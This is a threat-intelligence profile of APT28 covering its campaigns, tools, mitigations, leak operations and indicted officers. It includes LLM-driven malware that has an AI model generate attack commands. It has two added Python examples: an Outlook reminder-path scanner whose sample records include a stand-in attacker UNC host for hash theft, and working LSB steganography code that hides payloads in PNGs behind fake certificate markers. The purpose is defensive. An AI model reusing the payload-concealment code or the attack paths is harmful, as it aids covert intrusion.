On July 10, 2025, Ukraine's CERT-UA discovered a spear-phishing campaign against Ukrainian government executive authorities deploying a Python-based infostealer it named LAMEHUG — the first publicly documented malware by any threat actor to operationally integrate a Large Language Model at runtime. The phishing emails were sent from a compromised Ukrainian ministry account and carried a ZIP archive named "Додаток.pdf.zip" (Ukrainian for "Appendix"). Inside was an executable carrying a .pif extension (a legacy Program Information File type that Windows still runs as an ordinary executable, used here to disguise the payload), compiled with PyInstaller. LAMEHUG's defining characteristic is that it generates its own attack commands dynamically by querying Alibaba Cloud's Qwen 2.5-Coder-32B-Instruct model via the Hugging Face API — base64-encoded text prompts describing tasks ("gather system information") are sent over HTTPS to the model, which returns OS commands executed on the victim system. The command logic is therefore not hardcoded and cannot be matched by static signatures, although the embedded prompts and the Hugging Face API endpoint in the binary still are. The malware collects system information and searches for Office, PDF, and TXT files, exfiltrating via SFTP or HTTP POST to compromised infrastructure. CERT-UA attributes the campaign to UAC-0001 (APT28) with moderate confidence. Picus Security assessed LAMEHUG as a proof-of-concept that demonstrates APT28 is actively exploring AI-assisted adaptive attack techniques. Later variants used filenames impersonating AI image generators (AI_generator_uncensored_Canvas_PRO_v0.9.exe) — making legitimate AI tool requests in the background while executing the infostealer payload.

Nearest Neighbor Attack — Remote Close-Access via Daisy-Chained WiFi (2022)

Detected by Volexity on February 4, 2022 at a Washington D.C. organization conducting Ukraine-related research, the Nearest Neighbor Attack represents one of the most technically creative documented intrusions in APT28's history. Unable to use stolen enterprise WiFi credentials over the public internet (blocked by MFA), APT28 instead compromised multiple organizations in adjacent buildings within wireless range of the target — daisy-chaining through dual-homed systems (machines connected to both Ethernet and WiFi) until reaching a device that could connect to three wireless access points near the target's conference room windows. From there, they used RDP from an unprivileged account to move laterally and exfiltrate data, running a batch script (servtask.bat) to dump Windows registry hives (SAM, Security, System) compressed into a ZIP archive. Privilege escalation was achieved via GooseEgg exploiting CVE-2022-38028, a Windows Print Spooler zero-day reported by the NSA and patched in October 2022. Volexity's investigation confirmed the target was being accessed to collect data on individuals with Ukraine expertise. Microsoft's April 2024 research on GooseEgg confirmed the indicators of compromise overlapped with Volexity's 2022 findings. Volexity described the technique as providing "all the benefits of being in close physical proximity to the target, while allowing the operator to be thousands of miles away" — effectively an OPCW-style close-access operation executed entirely from Russia.

CVE-2023-23397 — Outlook NTLM Hash Theft at Scale (2022–2023)

APT28 exploited CVE-2023-23397, a critical zero-day in Microsoft Outlook (CVSS 9.8), to silently steal NTLMv2 credentials from victims who simply received — not even opened — a malicious calendar appointment email. The vulnerability causes Outlook to automatically connect to an attacker-controlled UNC path when a specially crafted reminder fires, leaking the victim's Net-NTLMv2 response (commonly called the NTLMv2 hash) to the attacker's server without any user interaction whatsoever. APT28 used this technique against European government, military, energy, and transportation sector organizations beginning as early as April 2022, roughly concurrent with Russia's full-scale invasion of Ukraine. Microsoft patched the vulnerability in March 2023 after it was reported by Ukraine's CERT-UA, and confirmed exploitation against organizations in Europe in the months prior. The captured responses can be relayed to authenticate to other internal services without cracking, or cracked offline if the password is weak. In MITRE ATT&CK terms the mechanism is Forced Authentication (T1187) rather than client-side code execution: the crafted reminder parameter makes Outlook authenticate to the attacker's SMB or WebDAV server on the victim's behalf. Unit 42 (Palo Alto Networks) attributed exploitation directly to what they track as "Fighting Ursa" (APT28). Germany's BfV (Federal Office for the Protection of the Constitution) specifically warned German organizations in May 2024 that APT28 used this CVE in a broad 2022–2023 campaign against German government bodies and linked it to a DOJ indictment of GRU Unit 26165 officers.
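Added example, not Microsoft's published detection script: triage of the reminder-sound property that CVE-2023-23397 abuses. The exploit stores a UNC path in PidLidReminderFileParameter on a calendar or task item; this extracts the host from both plain UNC and WebDAV-style (`\\host@SSL@443\...`) forms and flags any host that is not internal. The message records are constructed, and how the property is exported from the mailbox (for example an EWS or Graph query) is left to the caller.

```python
"""Triage of PidLidReminderFileParameter values for CVE-2023-23397 (added example).

The exploit stores a UNC path in the reminder-sound property of a calendar or
task item; when the reminder fires, Outlook opens the path and the client
authenticates to the host named in it. This extracts that host from UNC and
WebDAV-style forms and flags any that is not internal. Message records are
constructed; fetching the property from a mailbox is left to the caller.
"""
import ipaddress
import re

# \\host\share\file.wav, \\host@80\path, \\host@SSL@443\DavWWWRoot\path
_UNC = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@SSL)?(?:@(?P<port>\d+))?\\", re.IGNORECASE)


def reminder_target_host(value):
    """Host named by a UNC reminder path, or None for local paths / no property."""
    if not value:
        return None
    m = _UNC.match(value)
    return m["host"].lower() if m else None


def is_internal(host, internal_suffixes=(), internal_nets=()):
    """True if host is an IP inside internal_nets or a name under internal_suffixes."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return any(host == s.lstrip(".") or host.endswith(s) for s in internal_suffixes)
    return any(ip in net for net in internal_nets)


def scan_messages(messages, internal_suffixes, internal_nets):
    """Return [(message id, host)] for items whose reminder path points outside."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    suffixes = [s.lower() for s in internal_suffixes]
    hits = []
    for msg in messages:
        host = reminder_target_host(msg.get("PidLidReminderFileParameter"))
        if host and not is_internal(host, suffixes, nets):
            hits.append((msg["id"], host))
    return hits


# Constructed sample records: id, sender and, where set, the reminder property.
SAMPLE_MESSAGES = [
    {"id": "msg-1", "sender": "hr@corp.example"},                      # property absent
    {"id": "msg-2", "sender": "it@corp.example",
     "PidLidReminderFileParameter": r"C:\Windows\Media\reminder.wav"},  # local file
    {"id": "msg-3", "sender": "ops@corp.example",
     "PidLidReminderFileParameter": r"\\fileserver.corp.example\audio\ding.wav"},
    {"id": "msg-4", "sender": "invoices@partner.example",
     "PidLidReminderFileParameter": r"\\203.0.113.50\share\r.wav"},
    {"id": "msg-5", "sender": "calendar@partner.example",
     "PidLidReminderFileParameter": r"\\drop.attacker.example@SSL@443\DavWWWRoot\r.wav"},
    {"id": "msg-6", "sender": "av@corp.example",
     "PidLidReminderFileParameter": r"\\10.1.2.3\sounds\chime.wav"},
]

if __name__ == "__main__":
    for msg_id, host in scan_messages(SAMPLE_MESSAGES, [".corp.example"], ["10.0.0.0/8"]):
        print(f"{msg_id}: reminder authenticates to external host {host}")
```

Any external hit is worth treating as a credential exposure for that mailbox's user, not just as phishing, because the authentication happened when the reminder fired. Blocking outbound SMB (445) at the perimeter stops the plain UNC form; the WebDAV form rides HTTP(S), which is why the WebClient service matters in the remediation guidance.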

OPCW Close-Access Operation — Physical Interception, The Hague (2018)

On April 10, 2018, four GRU Unit 26165 officers arrived at Amsterdam's Schiphol Airport on diplomatic passports, were met by a Russian embassy contact, rented a car loaded with specialized technical equipment including a wireless network panel antenna capable of intercepting WiFi traffic from a distance, and spent several days surveilling and photographing the OPCW headquarters building in The Hague. Their objective was to compromise the OPCW's internal WiFi network — timed to disrupt the organization's independent investigation of the Novichok poisoning of Sergei and Yulia Skripal in Salisbury, UK. The Dutch General Intelligence and Security Service (AIVD) intercepted the team, seized the equipment and approximately €20,000 in cash, and expelled them on an Aeroflot flight back to Moscow. Analysis of a laptop seized from officer Evgenii Serebriakov revealed pr-ior WiFi connections to the Alpha Palmiers Hotel in Lausanne (September 2016, where a WADA conference was targeted), to Kuala Lumpur (December 2017, related to the MH17 downing investigation), and to locations in Rio de Janeiro (August 2016, targeting U.S. and Canadian anti-doping agencies). This single seized laptop confirmed APT28 had been conducting physical close-access WiFi operations across multiple continents over at least two years. The four individuals identified were: Aleksei Morenets and Evgenii Serebriakov (both Unit 26165, cyber operators), and Alexey Minin and Oleg Sotnikov (HUMINT operators, likely from a supporting unit). All four were subsequently indicted in the October 2018 DOJ filing. The UK government confirmed the same Unit 26165 responsible for APT28 was behind the attempted OPCW breach.

Tools & Malware

APT28 maintains one of the widest documented custom toolchains of any nation-state actor, spanning every major operating system and covering the full intrusion lifecycle. The group regularly retires and replaces tooling when it is publicly burned, maintaining operational continuity across detection events.

  • X-Agent (CHOPSTICK): APT28's primary espionage implant, tracked by FireEye as CHOPSTICK and deployed across Windows, Linux, macOS, iOS, and Android. Modular architecture supporting keylogging, file exfiltration, screenshot capture, and remote command execution. In December 2016, CrowdStrike reported finding an Android variant of X-Agent embedded in an app (Попр-Д30.apk) developed by Ukrainian artillery officer Yaroslav Sherstuk to reduce D-30 howitzer targeting time from minutes to under 15 seconds, distributed on Ukrainian military forums from late 2014 through 2016. CrowdStrike assessed the implant could collect location and communications data from infected devices. That specific claim was substantially contested: the Ukrainian Ministry of Defense stated that artillery losses were far smaller than cited and not associated with hacking; the International Institute for Strategic Studies (IISS) denied that CrowdStrike had accurately used its data; security researcher Jeffrey Carr identified flaws in the attribution and noted the app lacked GPS functionality; and the app's developer denied it was compromised. The malware's presence in the app is verified; the operational impact on artillery losses is not. The July 2018 Mueller indictment named officer Nikolay Kozachek as having "developed, customized, and monitored" X-Agent across APT28 operations.
  • X-Tunnel and JHUHUGIT (Seduploader): X-Tunnel is the encrypted tunneling tool used for persistent access and lateral movement once X-Agent is deployed, proxying traffic over HTTP, HTTPS, and other channels. JHUHUGIT, also tracked as Seduploader and SOURFACE, is the first-stage downloader that typically precedes X-Agent on a newly compromised host.
  • LoJax: A UEFI rootkit — the first nation-state UEFI rootkit documented as used in the wild, discovered by ESET in 2018. Survives operating system reinstallation and hard drive replacement, requiring firmware-level remediation to fully remove.
  • PRISMEX suite (PrismexSheet / PrismexDrop / PrismexLoader / PrismexStager): Multi-component toolkit documented by Trend Micro (March 2026). Uses custom steganography, COM hijacking, and the Covenant C2 framework for fileless execution. Includes both espionage and wiper capabilities. C2 traffic routes through Filen.io cloud storage for detection evasion. The steganography implementation is technically specific: shellcode is concealed within valid PNG image files using the Least Significant Bit (LSB) of each pixel's four bytes — the extracted payload embeds the AES-CBC encryption key, IV, and encrypted content. Payloads are additionally Base64-encoded and bookended with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- strings to masquerade as X.509 certificate data.
  • SpyPress family (SpyPress.MDAEMON / SpyPress.ROUNDCUBE / SpyPress.HORDE / SpyPress.ZIMBRA): JavaScript payloads deployed via Operation RoundPress (ESET, 2025). Inject into victim webmail sessions via XSS to harvest credentials, exfiltrate email and contacts, and — in the MDAEMON variant — bypass two-factor authentication by extracting 2FA secrets and creating persistent application passwords.
  • HEADLACE / MASEPIE: Custom implants documented in the May 2025 21-agency advisory (CISA AA25-141A), deployed against logistics and technology companies supporting Ukraine aid operations.
  • NotDoor (Outlook backdoor): COM hijacking-based Outlook backdoor tied to APT28 by CERT-UA and security researchers. Used alongside BeardShell and the Covenant framework in 2026 campaign operations against European organizations.
  • Zebrocy: First-stage downloader and reconnaissance implant, rebuilt repeatedly in different languages (Delphi, AutoIt, C#, Go, Python and others), that profiles the host (system information, running processes, screenshots) and fetches follow-on tooling only for victims of interest. Used against NATO member targets.
  • CORESHELL: Downloader family from FireEye's 2014 APT28 report, a later evolution of the SOURFACE downloader, used to retrieve second-stage payloads in campaigns against European government and security organizations.
  • MiniDoor: Lightweight initial access backdoor documented in the 2026 dual zero-day campaign for establishing persistence before deploying heavier tooling.
  • PixyNetLoader: Network-aware loader documented in the 2026 campaign, used to stage and deploy additional payloads while profiling victim network topology.
  • BEARDSHELL: Custom web shell deployed in 2026 campaign operations for persistent server-side access. Explicitly attributed to APT28 by Ukrainian authorities and security researchers including CERT-UA.
  • BadPaw: Multi-stage .NET loader using steganography to hide encrypted payloads in image files. Implements sandbox detection before executing. Documented by ClearSky in 2026 against Ukrainian organizations.
  • MeowMeow: Backdoor payload delivered by BadPaw. Communicates over encrypted channels, implements anti-analysis techniques, and self-terminates if it detects a monitored environment.
  • Fysbis / Komplex / Drovorub: Platform-specific implants for Linux (Fysbis, Drovorub) and macOS (Komplex), extending APT28's reach beyond Windows endpoints to Linux servers and Apple workstations.
  • GooseEgg: Post-compromise privilege escalation tool used since at least June 2020 (possibly April 2019), documented by Microsoft in April 2024. Exploits CVE-2022-38028 (Windows Print Spooler) — a vulnerability reported by the NSA — to execute arbitrary code at SYSTEM level by modifying a JavaScript constraints file. GooseEgg spawns attacker-specified child processes with SYSTEM permissions, enabling credential theft and lateral movement. The embedded malicious DLL it drops typically contains "wayzgoose" in the filename (e.g., wayzgoose23.dll). Microsoft detects it as HackTool:Win64/GooseEgg. CVE-2022-38028 was patched in October 2022 but GooseEgg was still used in post-patch environments where patching had not been applied.
  • LAMEHUG: Python-based infostealer first documented by CERT-UA on July 10, 2025, and the first publicly documented malware to call an LLM at runtime. It queries Alibaba's Qwen 2.5-Coder-32B-Instruct model through the Hugging Face API with Base64-encoded prompts and executes the OS commands the model returns, so the reconnaissance and collection commands never appear as strings in the binary. Compiled with PyInstaller and distributed as .pif, .exe, and .py variants, it collects system information and documents and exfiltrates them over SFTP or HTTP POST. CERT-UA attributes it to UAC-0001 (APT28) with moderate confidence. Its practical effect was modest; its significance is as an indicator that APT28 is operationalizing AI-assisted tooling, and that outbound traffic from endpoints to public LLM APIs is now a detection surface worth baselining.
  • Downdelph: First-stage downloader written in Delphi (ESET, 2016), in a few deployments installed together with a custom bootkit and rootkit for pre-OS persistence, predating LoJax and showing APT28's longstanding interest in below-the-OS implants.
  • Cannon: A C# Trojan (Unit 42, November 2018) delivered through spear-phishing with macro-enabled Word documents that fetch a remote template. Its distinguishing feature is command and control over email (SMTP/POP3 to attacker-controlled accounts) rather than HTTP, which sidesteps web-proxy-centric monitoring.
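The LSB-in-PNG carrier and the fake certificate envelope described above for PRISMEX (and the image steganography attributed to BadPaw) are reconstructed here as an added example; this is not code from either toolkit nor from Trend Micro or ClearSky. Bit order, the 32-bit length prefix, 8-bit RGBA with filter type 0, and the 32-byte key / 16-byte IV split are assumptions, and the AES-CBC step is omitted because the point is the carrier and the triage check: a Base64 body between CERTIFICATE markers that does not start with a DER SEQUENCE is not a certificate.

```python
import base64
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PEM_HEAD = b"-----BEGIN CERTIFICATE-----"
PEM_TAIL = b"-----END CERTIFICATE-----"


def _chunk(tag, data):
    # PNG chunk layout: 4-byte length, 4-byte tag, data, CRC32 over tag+data.
    body = tag + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body))


def write_png_rgba(width, height, pixels):
    # Minimal 8-bit RGBA encoder; every scanline gets filter byte 0 (None).
    rows = b"".join(b"\x00" + pixels[y * width * 4:(y + 1) * width * 4] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b"")


def read_png_rgba(png):
    # Walk the chunks, join IDAT, inflate, strip the per-row filter byte. 8-bit RGBA, filter 0 only.
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        tag, data = png[pos + 4:pos + 8], png[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", data[:10])
            if (depth, ctype) != (8, 6):
                raise ValueError("example handles 8-bit RGBA only")
        elif tag == b"IDAT":
            idat += data
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw, stride = zlib.decompress(idat), width * 4 + 1
    if any(raw[y * stride] != 0 for y in range(height)):
        raise ValueError("example handles filter type 0 only")
    return width, height, b"".join(raw[y * stride + 1:(y + 1) * stride] for y in range(height))


def embed_lsb(pixels, payload):
    # Assumed framing: 32-bit big-endian length, then payload bits MSB-first, one per channel byte.
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 8 > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for i, byte in enumerate(framed):
        for b in range(8):
            out[i * 8 + b] = (out[i * 8 + b] & 0xFE) | ((byte >> (7 - b)) & 1)
    return bytes(out)


def extract_lsb(pixels):
    # Inverse of embed_lsb: collect LSBs, read the length prefix, then that many bytes.
    def take(n_bytes, bit_offset):
        vals = []
        for i in range(n_bytes):
            v = 0
            for b in range(8):
                v = (v << 1) | (pixels[bit_offset + i * 8 + b] & 1)
            vals.append(v)
        return bytes(vals)
    (length,) = struct.unpack(">I", take(4, 0))
    return take(length, 32)


def triage_pem_blob(blob):
    # A real PEM certificate body is DER and starts with the SEQUENCE tag 0x30 (Base64 "MII...").
    # Anything else between CERTIFICATE markers is data wearing a certificate costume.
    if not (blob.startswith(PEM_HEAD) and blob.rstrip().endswith(PEM_TAIL)):
        return "no-pem-envelope", b""
    inner = blob[len(PEM_HEAD):blob.rfind(PEM_TAIL)]
    body = base64.b64decode(b"".join(inner.split()))
    return ("der-sequence" if body[:1] == b"\x30" else "pem-envelope-without-der"), body


def demo():
    # Constructed sample: a 64x64 grey RGBA cover and dummy key || IV || "ciphertext" bytes.
    # The 32-byte key / 16-byte IV split is an assumed layout; no AES is performed here.
    width = height = 64
    cover = bytes([0x80, 0x80, 0x80, 0xFF]) * (width * height)
    key, iv, ct = b"K" * 32, b"I" * 16, b"\xAA\x55" * 40
    envelope = PEM_HEAD + b"\n" + base64.encodebytes(key + iv + ct) + PEM_TAIL + b"\n"
    png = write_png_rgba(width, height, embed_lsb(cover, envelope))
    _, _, pixels = read_png_rgba(png)
    verdict, body = triage_pem_blob(extract_lsb(pixels))
    return verdict, body[:32], body[32:48], body[48:]


if __name__ == "__main__":
    print(demo()[0])
```

The carrier side is the easy half: a stego PNG is still a perfectly valid PNG, and LSB changes are invisible to the eye and to checksum-based image validation. The detection value is in the envelope: any scanner that whitelists PEM blocks as "certificate material" should at least check that the decoded body is DER, and any PNG delivered by a loader that is immediately read back pixel by pixel rather than displayed is behaviour worth alerting on regardless of content.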

Mitigation & Defense

  • Zero-day patch velocity: APT28 exploits zero-days immediately upon or before public disclosure; CVE-2026-21513 was exploited eleven days before the patch was released. Establish emergency patching SLAs of 24 to 48 hours for critical Microsoft vulnerabilities, particularly in MSHTML, Office, Outlook, and Exchange, and apply vendor-published mitigations in the interval before a patch exists. CISA's KEV catalog, which includes APT28-linked CVEs such as CVE-2024-11182, provides a verified prioritization baseline.
  • Webmail infrastructure hardening: Operation RoundPress exploited unpatched Roundcube, MDaemon, Horde, and Zimbra servers for years. Webmail platforms outside the Microsoft/Google ecosystem often go unpatched. Establish dedicated patch tracking for webmail infrastructure, disable automatic HTML email rendering where possible, enforce strict Content Security Policy headers, and regularly audit mailbox forwarding rules (Sieve rules) for unauthorized entries.
  • SOHO router security: FrostArmada compromised MikroTik and TP-Link routers at scale, and factory reset alone was insufficient because APT28's firmware modifications survived standard resets. Upgrade to MikroTik RouterOS 7.14.2 or later and TP-Link firmware released after March 2025. Change all default administrative credentials, disable SSH/Telnet and web management on WAN interfaces, implement certificate pinning on MDM-managed corporate devices, and verify that the DNS resolvers handed out by DHCP on every network segment are the ones you configured. For confirmed compromises, a hardware factory reset followed by a full firmware reflash is required.
  • Email security hardening: Deploy advanced anti-phishing controls including sandboxed attachment detonation, disabling macros by default, and enforcing DMARC/DKIM/SPF across all domains. Spear-phishing, including via geopolitically tailored lures, remains APT28's primary initial access vector.
  • Credential protection and MFA: Deploy Windows Credential Guard, deploy LAPS for local admin accounts, monitor for credential dumping tool signatures, and implement phishing-resistant MFA (FIDO2 hardware tokens, passkeys) rather than SMS or TOTP codes; NCSC and CISA both recommend such factors over SMS codes. APT28's SpyPress.MDAEMON showed why: it stole the underlying TOTP seed and created an application password, which no code rotation fixes. Password spraying through Tor is a documented APT28 tactic (the joint NSA/CISA/FBI/NCSC advisory of July 2021 on GRU brute forcing), so block or alert on authentication from Tor exit nodes.
  • Cloud identity and OAuth security: FrostArmada targeted OAuth tokens for Microsoft 365 services at scale. Monitor for OAuth token usage from unexpected geographic locations, implement conditional access policies, and review application password lists for unauthorized entries (a specific SpyPress.MDAEMON persistence mechanism).
  • Network segmentation: Isolate sensitive systems (political communications, classified data stores, logistics coordination systems) on network segments with strict egress filtering. APT28 conducts broad lateral movement after initial compromise and exploits trust relationships between partner organizations to expand access.
  • Physical surveillance awareness: Internet-connected cameras at or near sensitive facilities (border crossings, military installations, logistics hubs, data centers) should use non-default credentials, be network-segmented from corporate infrastructure, run current firmware, and have WAN access disabled where not operationally required. APT28 accessed RTSP feeds using default and brute-forced credentials.
  • Threat intelligence integration: APT28 IOCs are among the most extensively documented of any threat actor. The MITRE ATT&CK G0007 entry, CISA AA25-141A, ESET's Operation RoundPress report, and Lumen/Black Lotus Labs FrostArmada analysis all provide verified, actionable indicator sets. Subscribe to threat intel feeds covering GRU/APT28 infrastructure — C2 IPs and domains rotate frequently but signature patterns remain consistent.
  • Assume long-dwell compromise: APT28 routinely maintains dormant access for months or years before activating implants. A single detected IOC or evicted implant should trigger full incident response, including historical log review for extended dwell indicators, not just point-in-time remediation.
analyst note

APT28 operates in parallel with Sandworm (GRU Unit 74455). While APT28 focuses on intelligence collection and political interference, Sandworm specializes in destructive operations. Organizations in APT28's target profile should assess their Sandworm exposure simultaneously; the two groups share infrastructure and targeting in Ukrainian operations. The July 2018 DOJ indictment named three Unit 74455 officers alongside nine from Unit 26165, confirming that 74455 supported the 2016 election operation, including the DCLeaks and Guccifer 2.0 release infrastructure.

Hack-and-Leak Doctrine

APT28 is one of the few state-sponsored groups that does not simply collect intelligence quietly — it weaponizes stolen data through a structured leak-and-amplification pipeline designed to maximize political damage. Understanding this pipeline separates APT28 from pure espionage actors and explains why its campaigns have outsized geopolitical impact far beyond the technical breach itself.

The doctrine operates in three phases. First, APT28 selects targets based on GRU information operations priorities — stolen data must have the capacity to embarrass, delegitimize, or destabilize a political actor. Second, stolen material is curated: not all exfiltrated data is released; specific emails, documents, and communications are selected to tell a particular narrative. Third, release is routed through cutouts to create deniability and amplify reach.

In the 2016 U.S. election operation, APT28 used two personas as release vehicles: DCLeaks (a fictitious "hacktivist" site whose domain was registered in April 2016) and Guccifer 2.0 (a fabricated Romanian hacker persona). Both were run by GRU officers, with Unit 74455 assisting in the releases and their promotion, as set out in the July 2018 indictment. Guccifer 2.0 directly contacted and briefed U.S. journalists and political figures, laundering GRU-sourced material as independent hacktivist leaks. Material was also passed to WikiLeaks, which served as the primary publication vector for the DNC and Podesta emails. The Mueller investigation documented direct communication between GRU officers and WikiLeaks, including exchanges about release timing.

The same pattern applied to the French election operation (2017), where stolen Macron campaign documents were dumped on the evening of May 5, hours before the legally mandated campaign blackout preceding the May 7 second-round runoff, leaving the campaign no lawful way to respond before election day. The WADA leaks (2016, 2017) followed the same model: medical records of athletes were released not simply to humiliate but to advance a specific Russian narrative about Western anti-doping hypocrisy in the wake of state-sponsored Russian doping revelations.

This doctrine has important defensive implications. Organizations in APT28's target profile should not assess compromise solely by what an attacker accessed. The strategic question is what narrative the stolen material could support if selectively released and how a public disclosure of that material would be managed.

Personnel, Indictments & Physical Attribution

APT28 is among the most thoroughly named and indicted nation-state actor groups in public record. The combination of DOJ indictments, European criminal proceedings, open-source investigative journalism (notably Bellingcat), and seized technical equipment has placed specific individuals on the record to a degree unusual in the field of state-sponsored threat intelligence.

July 2018 Mueller Indictment — 12 GRU Officers (Nine from Unit 26165, Three from Unit 74455)

The grand jury indictment filed July 13, 2018 named Viktor Borisovich Netyksho as the commanding officer of Unit 26165 at the time of the 2016 operations. It identified two operational structures within the unit: an attack/operations group commanded by Major Boris Alekseyevich Antonov, and a malware development and infrastructure support group commanded by Lieutenant Colonel Sergey Aleksandrovich Morgachev, the officer named as having directed "development, customization, and monitoring" of X-Agent, with subordinates reporting to him directly. The nine Unit 26165 defendants were Viktor Borisovich Netyksho, Boris Alekseyevich Antonov, Dmitriy Sergeyevich Badin, Ivan Sergeyevich Yermakov, Aleksey Viktorovich Lukashev, Sergey Aleksandrovich Morgachev, Nikolay Yuryevich Kozachek (Lieutenant Captain, X-Agent developer), Pavel Vyacheslavovich Yershov, and Artem Andreyevich Malyshev (Second Lieutenant, monitored X-Agent implants). The three Unit 74455 defendants were Aleksandr Vladimirovich Osadchuk (Colonel and commanding officer of Unit 74455, named because that unit assisted with the DCLeaks and Guccifer 2.0 releases and their promotion), Aleksey Aleksandrovich Potemkin (supervised infrastructure), and Anatoliy Sergeyevich Kovalev (charged with the intrusions into state election boards and an election-software vendor). Kovalev is notable for also being named in the October 2020 Sandworm indictment, tying the 2016 operation's Unit 74455 contingent to Sandworm's later destructive campaigns. All twelve remain in Russia and none have appeared in court.

October 2018 DOJ Indictment — Unit 26165 Close-Access Officers

A separate October 2018 indictment charged seven GRU officers, including Aleksei Sergeyevich Morenets and Evgenii Mikhaylovich Serebriakov — the two Unit 26165 cyber operators intercepted in The Hague in April 2018. The indictment established that these individuals had conducted on-site WiFi hacking operations in Rio de Janeiro (August 2016, targeting WADA/USADA), Lausanne (September 2016, targeting WADA and the Canadian Centre for Ethics in Sport), and had been en route to the Spiez chemical laboratory in Switzerland when intercepted. Ivan Sergeyevich Yermakov was also named in this indictment for providing remote reconnaissance support during the physical OPCW operation.

Germany — Arrest Warrant for Dmitry Badin

German federal prosecutors issued an arrest warrant in May 2020 for Dmitry Sergeevich Badin (born November 15, 1990, Kursk) for his alleged role in the 2015 Bundestag breach. Badin was already on the FBI's wanted list for WADA-related operations. Bellingcat and The Insider confirmed his Unit 26165 affiliation by tracing his registered address in car ownership records to 20 Komsomolsky Prospekt, Moscow — the documented address of Unit 26165's headquarters. A second German arrest warrant was issued in 2022 for Nikolay Kozachek for the 2017 compromise of the NATO Joint Air Power Competence Centre in Kalkar, Germany, where X-Agent was installed with a keylogger.

Unit 26165 Physical Address and Structure

Unit 26165 is headquartered at 20 Komsomolsky Prospekt, Moscow — a fact confirmed through Russian corporate registries, car ownership databases cross-referenced by Bellingcat, and references in public Russian military education materials. The unit was originally created on May 23, 1953 as the Soviet GRU's cryptography and signals intelligence center. The current commander as of public records is Colonel Dmitry Aleksandrovich Mikhailov, who replaced Viktor Netyksho in January 2018 — shortly after the 2016 election operation concluded and indictments were being prepared. The EU sanctioned Unit 26165 as an institution, alongside named officers Dmitry Badin and GRU head Igor Kostyukov, in October 2020.

APT28 vs. APT29 — Key Distinctions

APT28 and APT29 are frequently conflated online because both are Russian state-sponsored groups responsible for high-profile intrusions. They are separate organizations with different sponsors, different operational styles, and different strategic objectives. The distinction matters for defenders because the detection approach, dwell behavior, and threat model differ significantly.

  • Sponsor: APT28 is operated by the GRU (military intelligence). APT29 is operated by the SVR (Foreign Intelligence Service — Russia's external civilian intelligence service, equivalent in role to the CIA). The GRU and SVR are separate agencies with different cultures, priorities, and command structures.
  • Operational philosophy: APT28 is aggressive, loud by nation-state standards, and accepts higher operational security risk in exchange for operational tempo. It is willing to burn zero-days rapidly, conduct physical operations, use hack-and-leak to maximize political impact, and run multiple concurrent campaigns. APT29 is defined by extreme patience and stealth — the SolarWinds supply chain compromise ran for approximately nine months before discovery, reflecting a preference for long-term, low-noise access over rapid exploitation.
  • Typical access methods: APT28 relies heavily on spear-phishing, password spraying, zero-day exploitation, and increasingly physical/proximity attacks. APT29 is known for supply chain compromise, OAuth token theft, and the exploitation of trusted software update mechanisms — the SolarWinds SUNBURST backdoor was delivered as a legitimate signed software update to approximately 18,000 organizations.
  • Post-compromise objectives: APT28 collects intelligence and in some cases releases stolen data publicly for information operations. APT29 collects intelligence and does not typically leak — its objective is durable, undetected access to high-value targets (foreign ministries, intelligence agencies, pharmaceutical companies during COVID-19 vaccine development).
  • Detection profile: APT28 leaves more forensic artifacts due to its operational tempo. APT29 is exceptional at cleaning up after itself and living off the land. Hunting for APT29 typically requires behavioral analytics and identity baseline anomaly detection rather than IOC matching; APT28 is more amenable to IOC-based detection given its larger documented indicator set.
  • Both groups targeted the DNC in 2016 — independently, using separate infrastructure and techniques. CrowdStrike's investigation found both COZY BEAR (APT29) and FANCY BEAR (APT28) simultaneously present in the DNC network, apparently unaware of each other. This is consistent with the GRU and SVR operating as competing agencies rather than coordinating collection against the same target.

Documented Statements on APT28

The following statements are drawn from official government advisories and primary security research. Direct quotations are kept to a maximum of 14 words per source in accordance with fair use practice. Each is provided with full attribution for verification.

  • UK NCSC Director of Operations Paul Chichester (May 2025, NCSC Advisory): Paul Chichester described the campaign as presenting "a serious risk to targeted organizations" — specifically those involved in delivering assistance to Ukraine. He called on executives and network defenders across logistics and technology companies to "recognise the elevated threat" and take immediate protective action.
  • ESET researcher Matthieu Faou (May 2025, Operation RoundPress): Faou observed that webmail servers are attractive targets because vulnerabilities "can be triggered remotely by sending an email message." He noted that many organizations fail to keep webmail infrastructure patched, creating a persistent window of exposure that APT28 exploited across Roundcube, MDaemon, Horde, and Zimbra over multiple years.
  • Trend Micro / Feike Hacquebord (April 2026, Dark Reading): "Pawn Storm doesn't shy away from old techniques when they are still effective." Hacquebord's observation is significant: the DNS hijacking technique at the core of FrostArmada is more than 20 years old. Longevity of effectiveness, not novelty, drives APT28's toolkit decisions.
  • Trellix (February 2026, CVE-2026-21509 campaign analysis): Trellix described the tradecraft as reflecting "a well-resourced, advanced adversary consistent with APT28's profile" — pointing specifically to multi-stage malware, extensive obfuscation, cloud service abuse for C2, and persistent targeting of email infrastructure.
  • Denis Calderone, CTO of Suzu Labs (April 2026, Dark Reading): Calderone offered a frank assessment of defensive reality: once APT28 gains a foothold in an organization without a dedicated security operations function, "a small org is going to have a very hard time catching them." His broader point was that APT28's sophistication primarily manifests post-access — initial entry methods are often the same ones seen from far less capable actors.
  • Lumen Black Lotus Labs (April 2026, FrostArmada analysis): Black Lotus Labs described how the technique "modified DNS settings on compromised routers to hijack local network traffic" — a passive, infrastructure-layer credential interception mechanism that required no endpoint malware and generated almost no victim-side visibility.
